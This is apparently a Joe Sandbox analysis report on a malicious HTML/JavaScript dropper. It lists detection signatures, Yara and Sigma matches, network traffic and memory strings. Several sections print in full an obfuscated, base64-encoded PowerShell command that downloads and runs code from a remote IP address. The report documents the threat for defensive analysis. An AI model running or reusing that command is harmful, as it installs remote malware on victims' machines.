Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report file.html

Overview

General Information

Sample Name:file.html
Analysis ID:299
MD5:21ce403bd23afad9004a40cd043d8f2b
SHA1:ca86174a3ac0f03ca8cf27a5c55aa06cd0990f2c
SHA256:4826c5084dca50458c9584abb4046f06afdf6f6f4ee342364544fc0e892abaa9
Infos:

Most interesting Screenshot:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Yara detected Powershell download and execute
Sigma detected: Suspicious Script Execution From Temp Folder
PowerShell case anomaly found
Wscript starts Powershell (via cmd or directly)
Sigma detected: Suspicious Encoded PowerShell Command Line
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Suspicious powershell command line found
Sigma detected: WScript or CScript Dropper
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Tries to load missing DLLs
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is start
  • chrome.exe (PID: 6020 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation --single-argument C:\Users\user\Desktop\file.html MD5: 74859601FB4BEEA84B40D874CCB56CAB)
    • chrome.exe (PID: 7472 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:8 MD5: 74859601FB4BEEA84B40D874CCB56CAB)
    • chrome.exe (PID: 7180 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5016 /prefetch:8 MD5: 74859601FB4BEEA84B40D874CCB56CAB)
    • chrome.exe (PID: 8712 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8 MD5: 74859601FB4BEEA84B40D874CCB56CAB)
    • chrome.exe (PID: 8256 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3164 /prefetch:8 MD5: 74859601FB4BEEA84B40D874CCB56CAB)
    • chrome.exe (PID: 8600 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6516 /prefetch:8 MD5: 74859601FB4BEEA84B40D874CCB56CAB)
    • explorer.exe (PID: 3676 cmdline: C:\Windows\Explorer.EXE MD5: D7874DD30BA935AAED6F730A0ED84610)
      • wscript.exe (PID: 6608 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' MD5: 563EDAE37876138FDFF47F3E7A9A78FD)
        • cmd.exe (PID: 7184 cmdline: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA= MD5: 9D59442313565C2E0860B88BF32B2277)
          • conhost.exe (PID: 2988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
          • powershell.exe (PID: 7296 cmdline: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA= MD5: CDA48FC75952AD12D99E526D0B6BF70A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20210816\PowerShell_transcript.841675.bhylW44j.20210816191151.txtPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x11b:$sa1: -enc
  • 0x4df:$sa1: -enc
  • 0x106:$sb1: -w hidden
  • 0x4ca:$sb1: -w hidden
  • 0x101:$sc1: -nop
  • 0x4c5:$sc1: -nop
  • 0x110:$se1: -ep bypass
  • 0x4d4:$se1: -ep bypass
C:\Users\user\Documents\20210816\PowerShell_transcript.841675.bhylW44j.20210816191151.txtJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000013.00000003.10199880080.000001AF430F8000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x2bc:$s1: poWERshEll
    00000016.00000002.10523891301.000001C9302F0000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x1650:$s1: poWERshEll
    • 0x2314:$s1: poWERshEll
    • 0x2f64:$s1: poWERshEll
    • 0x323c:$s1: poWERshEll
    00000013.00000003.10197684686.000001AF430F8000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x2bc:$s1: poWERshEll
    00000013.00000003.10199731855.000001AF430F8000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x2bc:$s1: poWERshEll
    00000013.00000002.10205510794.000001AF433E5000.00000004.00000040.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x41ba:$s1: poWERshEll
    Click to see the 25 entries

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Suspicious Script Execution From Temp FolderShow sources
    Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3676, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , ProcessId: 6608
    Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
    Source: Process startedAuthor: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=, CommandLine: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6608, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=, ProcessId: 7184
    Sigma detected: WScript or CScript DropperShow sources
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3676, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , ProcessId: 6608
    Sigma detected: WSF/JSE/JS/VBA/VBE File ExecutionShow sources
    Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3676, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , ProcessId: 6608
    Sigma detected: Non Interactive PowerShellShow sources
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=, CommandLine: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=, CommandLine|base64offset|contains: FD, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7184, ProcessCommandLine: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=, ProcessId: 7296

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000C.00000000.9894395838.0000000004A10000.00000002.00000001.sdmp
    Source: Binary string: omation.pdb source: powershell.exe, 00000016.00000002.10534340939.000001C94736F000.00000004.00000001.sdmp
    Source: Binary string: wscui.pdb source: explorer.exe, 0000000C.00000000.9894395838.0000000004A10000.00000002.00000001.sdmp
    Source: global trafficHTTP traffic detected: GET /click.php HTTP/1.1Host: 185.244.41.28Connection: Keep-Alive
    Source: unknownNetwork traffic detected: HTTP traffic on port 54477 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64780
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54477
    Source: unknownNetwork traffic detected: HTTP traffic on port 53772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
    Source: unknownNetwork traffic detected: HTTP traffic on port 64780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 65369 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65369
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 8.241.126.121
    Source: unknownTCP traffic detected without corresponding DNS query: 8.241.126.121
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
    Source: unknownTCP traffic detected without corresponding DNS query: 8.241.126.121
    Source: unknownTCP traffic detected without corresponding DNS query: 8.241.126.121
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.117.254
    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.117.254
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
    Source: explorer.exe, 0000000C.00000000.9934649714.00000000051D0000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
    Source: powershell.exe, 00000016.00000002.10503275805.000001C92F82A000.00000004.00000001.sdmpString found in binary or memory: http://185.244.41.28
    Source: powershell.exe, 00000016.00000002.10525450774.000001C9303B4000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.10528004322.000001C930650000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.10522816383.000001C93029F000.00000004.00000001.sdmp, PowerShell_transcript.841675.bhylW44j.20210816191151.txt.22.drString found in binary or memory: http://185.244.41.28/c
    Source: powershell.exe, 00000016.00000002.10493820703.000001C92F054000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.10491858613.000001C92EE31000.00000004.00000001.sdmp, PowerShell_transcript.841675.bhylW44j.20210816191151.txt.22.drString found in binary or memory: http://185.244.41.28/click.php
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
    Source: angular.js.1.drString found in binary or memory: http://angularjs.org
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9934649714.00000000051D0000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9998559475.000000000E14F000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.10532759392.000001C946FDA000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: explorer.exe, 0000000C.00000000.9998559475.000000000E14F000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.10532714629.000001C946FD3000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
    Source: angular.js.1.drString found in binary or memory: http://errors.angularjs.org/1.6.4-local
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
